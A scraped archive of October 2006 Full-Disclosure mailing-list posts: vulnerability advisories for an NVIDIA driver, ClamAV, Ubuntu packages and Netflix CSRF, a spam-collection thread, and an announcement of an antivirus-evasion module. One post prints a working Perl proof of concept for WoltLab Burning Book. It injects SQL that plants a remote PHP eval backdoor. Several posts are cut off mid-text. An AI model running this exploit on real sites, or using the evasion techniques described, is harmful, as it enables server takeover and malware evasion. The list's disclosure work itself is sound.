[Full-disclosure] Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux
___ Rapid7, LLC Security Advisory Visit http://www.rapid7.com/ to download NeXpose, SC Magazine Winner of Best Vulnerability Management product. ___ Rapid7 Advisory R7-0025 Buffer Overflow in NVIDIA Binary Graphics Driver For Linux Published: Oct 16, 2006 Revision: 1.0 http://www.rapid7.com/advisories/R7-0025.jsp 1. Affected system(s): KNOWN VULNERABLE: o NVIDIA Driver For Linux v8774 o NVIDIA Driver For Linux v8762 PROBABLY VULNERABLE: o NVIDIA Driver for FreeBSD o NVIDIA Driver for Solaris o Earlier versions KNOWN FIXED: o None 2. Summary The NVIDIA Binary Graphics Driver for Linux is vulnerable to a buffer overflow that allows an attacker to run arbitrary code as root. This bug can be exploited both locally or remotely (via a remote X client or an X client which visits a malicious web page). A working proof-of-concept root exploit is included with this advisory. The NVIDIA drivers for Solaris and FreeBSD are also likely to be vulnerable. 3. Vendor status and information NVIDIA Corporation http://www.nvidia.com There have been multiple public reports of this NVIDIA bug on the NVNews forum [1,2] and elsewhere, dating back to 2004 [3]. NVIDIA's first public acknowledgement of this bug was on July 7th, 2006. In a public posting [1] on the NVNews forum, an NVIDIA employee reported having reproduced the problem, assigned it bug ID 239065, and promised a fix would be forthcoming. As of the publication date, the latest NVIDIA binary driver is still vulnerable. Furthermore, it is our opinion that NVIDIA's binary driver remains an unacceptable security risk based on the large numbers of reproducible, unfixed crashes that have been reported in public forums and bug databases. This number does not include bugs reported directly to NVIDIA. 1. http://www.nvnews.net/vbulletin/showthread.php?p=931048 (Jul 2006) 2. http://www.nvnews.net/vbulletin/showthread.php?t=76493(Sep 2006) 3. https://bugs.freedesktop.org/show_bug.cgi?id=2129 (Dec 2004) 4. http://lists.freedesktop.org/archives/xorg/2005-January/005642.html 5. http://forums.gentoo.org/viewtopic.php?t=282107 (Jan 2005) 6. https://bugs.eclipse.org/bugs/show_bug.cgi?id=87299 (Mar 2005) 7. http://www.nvnews.net/vbulletin/showthread.php?t=76206(Sep 2006) 4. Solution Disable the binary blob driver and use the open-source "nv" driver that is included by default with X. 5. Detailed analysis There are two NVIDIA graphics drivers for Linux: a closed-source binary blob driver provided by NVIDIA (which provides acceleration) and an open-source driver (which lacks acceleration). NVIDIA's binary blob driver contains an error in its accelerated rendering of glyphs (text character data) that can be exploited to write arbitrary data to anywhere in memory. The open-source driver is not vulnerable. The XRender extension provides a client function named XRenderCompositeString8 which tells the X server to render glyphs onto the screen. This request is processed by the server's ProcRenderCompositeGlpyhs function. This function pulls the glyphs out of the render request, constructs a glyph list, and then calls into the graphics driver via a registered callback function. The NVIDIA binary blob driver registers a function named _nv000373X. This function calculates a bounding BoxRec of the total area occupied by the glyph data. It then uses Xalloc to allocate a buffer large enough to hold the data by multiplying width * height. This buffer is then passed to another internal function called _nv53X. The _nv53X function iterates over the glyph list and copies glyph data into the buffer using each glyph's accumulated width, xOff, height, and yOff values to calculate the destination position in the buffer. The NVIDIA binary blob driver does not check this calculation against the size of the allocated buffer. As a result, a short sequence of user-supplied glyphs can be used to trick the function into writing to an arbitrary location in memory. It is important to note that glyph data is supplied to the X server by the X client. Any remote X client can gain root privileges on the X server using the proof of concept program attached. It is also trivial to exploit this vulnerability as a DoS by causing an existing X client program (such as Firefox) to render a long text string. It may be possible to use Flash movies, Java applets, or embedded web fonts to supply the custom glyph data necessary for reliable remote code execution. A simple HTML page containing an INPUT field with a long value is sufficient to demonstrate the
Re: [Full-disclosure] Ask for spam...
I think the point here is that you seed you email addy to these freebie newsletters and then wait for the spammer to harverst the email addy's. Propagation window shoud be about 10-15 days and then you can counter anlaysis the source data within smtp On 10/16/06, Louis Wang <[EMAIL PROTECTED]> wrote: May most of these emails are newsletters, not spam, huh?Does anyone could give me some spam archive, or spam to [EMAIL PROTECTED], thanks.--homepage:http://www.wang-labs.com2006/10/17, Michael Holstein < [EMAIL PROTECTED]>:> Here's what I did when researching the same thing ...>> Google "free stuff". Find a page with "thousands of free offers". Fill> one out and check *every* box. Reply to whatever "confirm" emails come in. >> I did a few of those "thousand freebie" things to various bogus email> addresses in a fake subdomain and was getting thousands per day (and it> wasn't long until the DHA attacks started on that newly created > subdomain either -- configure your first-touch MTA to blindly accept> anything as valid if you're curious, just be careful not to relay it).>> The nice thing about doing the subdomain trick is you can just delete > the subdomain when you're done and not waste your bandwidth (and disk> space) dealing with "test" SPAM.>> Cheers,>> Michael Holstein CISSP GCIA> Cleveland State University >> ___> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/>--Have a Good Day___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ask for spam...
May most of these emails are newsletters, not spam, huh? Does anyone could give me some spam archive, or spam to [EMAIL PROTECTED], thanks. -- homepage:http://www.wang-labs.com 2006/10/17, Michael Holstein <[EMAIL PROTECTED]>: > Here's what I did when researching the same thing ... > > Google "free stuff". Find a page with "thousands of free offers". Fill > one out and check *every* box. Reply to whatever "confirm" emails come in. > > I did a few of those "thousand freebie" things to various bogus email > addresses in a fake subdomain and was getting thousands per day (and it > wasn't long until the DHA attacks started on that newly created > subdomain either -- configure your first-touch MTA to blindly accept > anything as valid if you're curious, just be careful not to relay it). > > The nice thing about doing the subdomain trick is you can just delete > the subdomain when you're done and not waste your bandwidth (and disk > space) dealing with "test" SPAM. > > Cheers, > > Michael Holstein CISSP GCIA > Cleveland State University > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Have a Good Day ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-365-1] libksba vulnerability
=== Ubuntu Security Notice USN-365-1 October 16, 2006 libksba vulnerability CVE-2006-5111 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: libksba8 0.9.9-2ubuntu0.5.04 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: A parsing failure was discovered in the handling of X.509 certificates that contained extra trailing data. Malformed or malicious certificates could cause services using libksba to crash, potentially creating a denial of service. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba_0.9.9-2ubuntu0.5.04.diff.gz Size/MD5: 256789 7814506294c66d47a7acc67325acf5ba http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba_0.9.9-2ubuntu0.5.04.dsc Size/MD5: 675 b3398604d25bcbcb7dda502b0b36428d http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba_0.9.9.orig.tar.gz Size/MD5: 398846 458c6880f6cb191b65a6436877e413b8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba-dev_0.9.9-2ubuntu0.5.04_amd64.deb Size/MD5: 132624 475f53cc3b96aee0ccc6c9b3847d http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba8_0.9.9-2ubuntu0.5.04_amd64.deb Size/MD5:92024 7eda61b96dedbdf5b73437819e3cbfc3 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba-dev_0.9.9-2ubuntu0.5.04_i386.deb Size/MD5: 118938 af9a322a0a826922f505c4949b1c67ad http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba8_0.9.9-2ubuntu0.5.04_i386.deb Size/MD5:83352 49589a5bd441daf84384ed46809c296b powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba-dev_0.9.9-2ubuntu0.5.04_powerpc.deb Size/MD5: 133464 665fb8a0e1672bfbef24a23abde1eb18 http://security.ubuntu.com/ubuntu/pool/main/libk/libksba/libksba8_0.9.9-2ubuntu0.5.04_powerpc.deb Size/MD5:87838 2869d3fec34920fb112502a49fd995d6 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NVIDIA Linux/BSD/Solaris Drivers Local Root Buffer Overflow
NVIDIA Linux/BSD/Solaris Drivers Local Root Buffer Overflow KNOWN VULNERABLE: o NVIDIA Driver For Linux v8774 o NVIDIA Driver For Linux v8762 PROBABLY VULNERABLE: o NVIDIA Driver for FreeBSD o NVIDIA Driver for Solaris o Earlier versions KNOWN FIXED: o None http://securitydot.org/xpl/exploits/vulnerabilities/articles/1714/exploit.html -- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ask for spam...
On 10/16/06, Michael Holstein <[EMAIL PROTECTED]> wrote: > Here's what I did when researching the same thing ... > > Google "free stuff". Find a page with "thousands of free offers". Fill > one out and check *every* box. Reply to whatever "confirm" emails come in. Technically thats not spam. since you solicit those emails and then confirm your solicitation -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] some solutions for HITB 2006 CTF
hi i did some solutions for HITB 2006 CTF daemons. at this website: http://matador.altervista.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.15.06: Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability
Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability iDefense Security Advisory 10.15.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 15, 2006 I. BACKGROUND Clam AntiVirus is a multi-platform GPL anti-virus toolkit. The main purpose of which is integration into electronic mail servers. More information about ClamAV can be found at http://clamav.net/. Microsoft Compressed HTML Help (CHM) files are commonly used for windows based software documentation. II. DESCRIPTION Remote exploitation of a input validation vulnerability in Clam AntiVirus's ClamAV could allow attackers to crash the virus scanning service. The vulnerability specifically exists due to improper handling of an specially crafted CHM file. While processing such a file, ClamAV may attempt to read an invalid memory location resulting in abnormal termination of the scanning service. III. ANALYSIS Successful exploitation could allow an attacker to crash the ClamAV virus scanning service. Exploitation requires that attackers send a specially constructed CHM file through an e-mail gateway or personal anti-virus client using the ClamAV scanning engine. IV. DETECTION iDefense has confirmed this vulnerability affects Clam AntiVirus ClamAV v0.88.4. All prior versions that implement CHM file scanning are suspected to be vulnerable. V. WORKAROUND iDefense is unaware of any effective workarounds for this issue. VI. VENDOR RESPONSE The ClamAV team has addressed this vulnerability within version 0.88.5. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-5295 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/28/2006 Initial vendor notification 09/29/2006 Initial vendor response 10/10/2006 Second vendor notification 10/15/2006 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Damian Put and an anonymous researcher. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.15.06: Clam AntiVirus ClamAV rebuildpe Heap Overflow Vulnerability
Clam AntiVirus ClamAV rebuildpe Heap Overflow Vulnerability iDefense Security Advisory 10.15.06 http://www.idefense.com/intelligence/vulnerabilities/ Oct 15, 2006 I. BACKGROUND Clam AntiVirus is a multi-platform GPL anti-virus toolkit. The main purpose of which is integration into electronic mail servers. More information is available from http://clamav.net/ II. DESCRIPTION Remote exploitation of a buffer overflow in Clam AntiVirus allows attackers to potentially execute arbitrary code or cause a denial of service condition. This vulnerability specifically exists within code dealing PE (Portable Executable) format files. While processing certain PE elements, two variables can be very large and integer overflow could occur. This would result in less memory being allocated than was expected by the programmer and subsequent code would overflow the heap buffer. III. ANALYSIS Successful exploitation requires an attacker to send a specially constructed executable file through a mail gateway or personal anti- virus client utilizing the ClamAV scanning engine. IV. DETECTION iDefense has confirmed this vulnerability on version 0.88.1 and 0.88.4 of ClamAV. All previous versions are suspected to be vulnerable to this issue. V. WORKAROUND iDefense is not aware of any effective workarounds. VI. VENDOR RESPONSE The ClamAV team has addressed this vulnerability within version 0.88.5. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-4182 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 08/16/2006 Initial vendor notification 08/20/2006 Initial vendor response 10/10/2006 Second vendor notification 10/15/2006 Coordinated public disclosure IX. CREDIT The discovery of this vulnerability is credited to Damian Put <[EMAIL PROTECTED]>. Get paid for vulnerability research http://www.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-364-1] Xsession vulnerability
=== Ubuntu Security Notice USN-364-1 October 16, 2006 xinit vulnerability CVE-2006-5214 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: xinit1.0+0.99.1-4ubuntu0.1 Ubuntu 6.06 LTS: xinit1.0.1-0ubuntu3.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: A race condition existed that would allow other local users to see error messages generated during another user's X session. This could allow potentially sensitive information to be leaked. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0+0.99.1-4ubuntu0.1.diff.gz Size/MD5:14146 c7b3963113b296e32c2ead0dd2af3a47 http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0+0.99.1-4ubuntu0.1.dsc Size/MD5: 646 fd5405aa4f5fa0e4de8e8daefad75d0d http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0+0.99.1.orig.tar.gz Size/MD5: 107406 599f9b66c0ee38be4fbbea79e5fdd638 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0+0.99.1-4ubuntu0.1_amd64.deb Size/MD5:27312 037df5b51d6dcf725f151d3c43ae i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0+0.99.1-4ubuntu0.1_i386.deb Size/MD5:26450 2e9440c1df9b104940129ca2239e0e04 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0+0.99.1-4ubuntu0.1_powerpc.deb Size/MD5:28718 f89cf91b06749bb82d97ea501b829c96 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0+0.99.1-4ubuntu0.1_sparc.deb Size/MD5:26844 ddc8f312a3071c237856eb878ec53abd Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0.1-0ubuntu3.1.diff.gz Size/MD5:14629 4ccd21e14340b056874830203b05dc83 http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0.1-0ubuntu3.1.dsc Size/MD5: 631 05dcb2791d94d1ee7a54f6c07cc2e854 http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0.1.orig.tar.gz Size/MD5: 34 85a17ee07848a824c11c89f030c1aaf1 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0.1-0ubuntu3.1_amd64.deb Size/MD5:27652 12cb888246bdc623ecbebc96e6a6dd9c i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0.1-0ubuntu3.1_i386.deb Size/MD5:26780 7f9b895edec9e0133f9b5b5fbed010d3 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0.1-0ubuntu3.1_powerpc.deb Size/MD5:29016 0a32dd3d1a001c61bf9a48874a26c44c sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xinit/xinit_1.0.1-0ubuntu3.1_sparc.deb Size/MD5:27146 8283ce116a633df7c39357ea5fc45b2c signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ask for spam...
Here's what I did when researching the same thing ... Google "free stuff". Find a page with "thousands of free offers". Fill one out and check *every* box. Reply to whatever "confirm" emails come in. I did a few of those "thousand freebie" things to various bogus email addresses in a fake subdomain and was getting thousands per day (and it wasn't long until the DHA attacks started on that newly created subdomain either -- configure your first-touch MTA to blindly accept anything as valid if you're curious, just be careful not to relay it). The nice thing about doing the subdomain trick is you can just delete the subdomain when you're done and not waste your bandwidth (and disk space) dealing with "test" SPAM. Cheers, Michael Holstein CISSP GCIA Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ask for spam...
Louis Wang writes: > Hi Guys: > I'm doing research on AntiSpam personally, I need a lot of spam > samples. I have try a lot to incur spam, but to now, I can only get > about 300 spam per day. > Could anybody kind to help me with spam collection? I use > [EMAIL PROTECTED] to collect spam. Please send as many spam as > possible to that mailbox. Or if you have spam archive, please send > them to me to [EMAIL PROTECTED] > Thanks in Advance! Post to Usenet with the email address you want to get spam at. It will come flowing in ;-) -Joe ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Netflix Cross Site Request Forgery Vulnerability
ANNOUNCEMENT Netflix Cross Site Request Forgery Vulnerability Release Date: 10/16/2006 Netflix notified: 9/25/2006 Author: David Ferguson, Security Researcher -- gmdavef [at] gmail com INTRODUCTION Recently I found that the Netflix.com site was vulnerable Cross Site Request Forgery (XSRF), also known as hostile linking. I notified Netflix about this problem on 9/25/06 and it appears they are finally making the necessary corrections. I want to make the information public to raise awareness of this type of vulnerability and hopefully educate others who may not have heard about it before. An excellent whitepaper about XSRF by Jesse Burns can be found at http://www.isecpartners.com/documents/XSRF_Paper.pdf. BACKGROUND Netflix is a company that offers a popular online DVD rental service. Over 5.5 million people are currently Netflix subscribers. Many users of the Netflix web site, when logging in, choose the option that says "Remember me on this computer". This option causes one or more cookies to be written to the user's computer. The cookie is sent automatically the next time a user visits the Netflix site, eliminating the need to enter credentials again. VULNERABILITY OVERVIEW XSRF is an application-level vulnerability where an attacker takes advantage of the trust that the web site has in the cookie. Commands are issued on the target application unbeknownst to the user. By exploiting the XSRF vulnerability, an attacker could have made changes to a victim's Netflix account simply by having him visit a malicious web site. Any Netflix user who had chosen the "remember me" option, or who happened to be logged in at the time, was subject to this attack. The victim would not have seen anything out of the ordinary that might indicate his Netflix account was affected. ATTACK SCENARIOS Netflix has corrected several of the vulnerabilities. Prior to the corrections, an attacker could use XSRF to perpetrate a number of actions on the victim including: - adding movies to his rental queue (still possible as of 10/16/06 a.m.) - adding a movie to the top of his rental queue (still possible as of 10/16/06 a.m.) - changing the name and address on the account - enabling/disabling extra movie information - changing the email address and password on the account (was limited exposure only) - cancelling the account (Unconfirmed/Conjectured) Chaos and/or embarrassment could result if an attacker decided to add random DVD's to the top of each victim's rental queue. In many cases, the attacker-chosen DVD's would have shipped out and arrived before the change was noticed. It is also possible to add dozens or even hundreds of DVD's to a victim's rental queue, all without his knowledge. One of the most serious exploits was the ability to change the name and mailing address on the account. An attacker could have changed the name and address (or just the address) on a large number of Netflix accounts. DVD's would subsequently have been shipped to the address of his choice and stolen. Another harmful exploit was the potential ability to change email address and password on the account. This particular exposure was limited in nature because the Netflix site normally requires input of the current password before changing the email address or password on the account. However, there was a certain time period after a user signed in where the current password was not required. During this time period, it was possible for a malicious site to cause the email address and password on a victim's account to be changed. The legitimate user would have been locked out of his account and full control given to the attacker. PROTECTING YOURSELF If you're a Netflix subscriber, there are several ways you can protect yourself until Netflix fully fixes their site. These safeguards would also help protect against XSRF vulnerabilities in other sites. Option 1 -- Don't use the "remember me" option when signing in. That will prevent stored cookies and protect you against XSRF attacks. You should also avoid visiting unknown or untrusted sites while signed in to Netflix. Finally, make sure to sign out and close all browser windows when finished using the Netflix site. Option 2 -- Use one browser (e.g., Firefox) exclusively for Netflix, and another browser (e.g., Internet Explorer) for all other web sites. Option 3 (not recommended) -- Use Firefox as your web browser and tell it not to load images from other sites. You can do this by putting a check in the box next to "for the originating web site only" under Tools--Options--Content. Please note that this option may not be 100% effective. MITIGATING XSRF Developers can prevent XSRF vulnerabilities from appearing in web applications in several ways. The white paper by Jesse Burns describes several alternatives. The best technique appears to be implementing a cryptographic token that must be passed as a parameter with every request. The cryptographic token would
[Full-disclosure] :ShAnKaR: WoltLab Burning Book <=1.1.2 multiple vulnerabilities
Hello bugtraq,
ShAnKaR (sec at shankar.antichat.ru ) reports multiple vulnerabilities
in WoltLab Burning Book. Original message in Russian is available from
http://www.security.nnov.ru/Odocument711.html
Short translation:
Author: ShAnKaR (sec at shankar.antichat.ru)
Vendor: woltlab.de
Tested version: WoltLab Burning Book 1.1.2
Level: Critical
Class: Remote code execution
addentry.php file contains this code:
while(list($key,$val)=each($_POST)) {
$$key=$val;
}
There is no validation for variable names sent with POST request, so,
it's possible to overwrite system variables. E.g. here:
$db->query("INSERT INTO bgb".$n."_posts
(iconid,authorname,posttime,message,nosmilies,emai
l,homepage,icq,aim,yim,msn,ipaddress,useragent,vis ible) VALUES
('".intval($iconid)."','".addslashes($name)."',".time().",'".addslashes($message)."','".intval($nosmilies)."','".addslashes($email)."','".addslashes($homepage)."','".intval($icq)."','".addslashes($aim)."','".addslashes($yim)."','".addslashes($msn)."','".
$REMOTE_ADDR."','".$HTTP_USER_AGENT."','".(($moderateposts) ? ("0") :
("1"))."')");
it's possible to add any data to database, and later this data can be
executed as a PHP code:
eval("\$template->output(\"".$template->get("index")."\");");
Exploit code (burning_book.pl):
#!/usr/bin/perl
# woltlab.de burning book <=1.1.2 SQL and PHP injection PoC
# use /index.php?q=phpinfo();exit;
# ShAnKaR sec[A]shankar.antichat.ru
# http://antichat.ru/
use LWP;
die("use ./burn-book.pl http://localhost/wbbook/ [1(number book db, default
`1`)]\n") if !$ARGV[0];$ARGV[1]='' if !$ARGV[1];
my $ua=LWP::UserAgent->new();
$ua->post($ARGV[0].'/addentry.php',[reg_image=>0,send=>'send',name=>1,message=>1,
n=>$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES
(char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]);
--
/3APA3A
http://security.nnov.ru/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VoMM: Taking browser exploits to the next level
Exploits for browser vulnerabilities are here to stay. Most security products today are using reactive methods (signatures) to detect the specific exploit, instead of trying to detect the general case of the vulnerability exploitation. I already demonstrated that evading those signatures is very easy. H.D. Moore, LMH, and I have decided to generalize the evasion methods and package them all into one project. Introducing: VoMM (eVade-o-Matic Module for metasploit) - Taking browser exploits to the next level. The purpose of this project is to create a module for Metasploit that will take any given browser exploit and make it as undetectable as possible. Currently, most Anti-Viruses signatures relies on "variants". Meaning, any little change in the malicious code is considered by the AV as a new variant. The VoMM project shows that this procedure cannot be applied to browser exploits, as each exploit can have endless number of "variants" with no change to the server side code. http://aviv.raffon.net/2006/10/15/VoMMTakingBrowserExploitsToTheNextLevel.aspx -- Aviv. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Nah. That's probably WAY too advanced for 'em. I get the feeling this is the AOL sort of person. Honestly, I'm surprised they figured out how to subscribe to this list in the first place... Ferdinand Klinzer wrote: > Google search : Intro to HTML > > cheers > > Am 16.10.2006 um 12:42 schrieb C. Hamby: > >>> Yipe! >>> >>> Ya know if you need an "intro to HTML" book I can probably scare >>> one up >>> for ya... :-) >>> >>> Pink Hat wrote: On 10/16/06, wac <[EMAIL PROTECTED]> wrote: > Hey you could start by writing those sites in english :P > http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal- HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8 Not perfect but readable... I guess... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Google search : Intro to HTML cheers Am 16.10.2006 um 12:42 schrieb C. Hamby: > Yipe! > > Ya know if you need an "intro to HTML" book I can probably scare > one up > for ya... :-) > > Pink Hat wrote: >> On 10/16/06, wac <[EMAIL PROTECTED]> wrote: >>> Hey you could start by writing those sites in english :P >>> >> >> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal- >> HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8 >> >> Not perfect but readable... I guess... >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (Darwin) iD8DBQFFM3NgivpgT1glX4cRAiiDAKCJSYmVrMNRbd3fnqk2eVUo2FWylgCgoxoQ BrkTpdSb3gdBQsBdoS6+psU= =ctNs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Yipe! Ya know if you need an "intro to HTML" book I can probably scare one up for ya... :-) Pink Hat wrote: > On 10/16/06, wac <[EMAIL PROTECTED]> wrote: >> Hey you could start by writing those sites in english :P >> > > http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8 > > Not perfect but readable... I guess... > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] speaking of code crunching... (challenge)
